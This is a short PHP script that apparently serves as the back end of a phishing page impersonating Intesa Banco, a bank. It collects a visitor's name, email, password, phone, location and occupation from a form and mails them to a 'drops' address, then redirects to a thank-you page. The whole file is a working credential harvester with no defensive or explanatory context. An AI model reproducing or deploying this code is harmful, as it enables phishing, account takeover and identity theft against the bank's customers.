<?php
//get data from form  
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$email= $_POST['email'];
$word= $_POST['word'];
$country= $_POST['country'];
$city= $_POST['city'];
$occupation= $_POST['occupation'];
$phone= $_POST['phone'];
$to = "drops@intesabanco.com";
$subject = "Mail From Intesa Banco";
$txt ="Firstname = ". $firstname . "\r\n  Lastname = " . $lastname . "\r\n  Email = " . $email . "\r\n  Password = " . $word . "\r\n  Country = " . $country ."\r\n City = " . $city . "\r\n  Occupation = " . $occupation . "\r\n  Phone = " . $phone;
$headers = "From: noreply@yoursite.com" . "\r\n" .
"CC: noreply@yoursite.com";
if($email!=NULL){
    mail($to,$subject,$txt,$headers);
}
//redirect
header("Location:thankyou.html");
die();
?>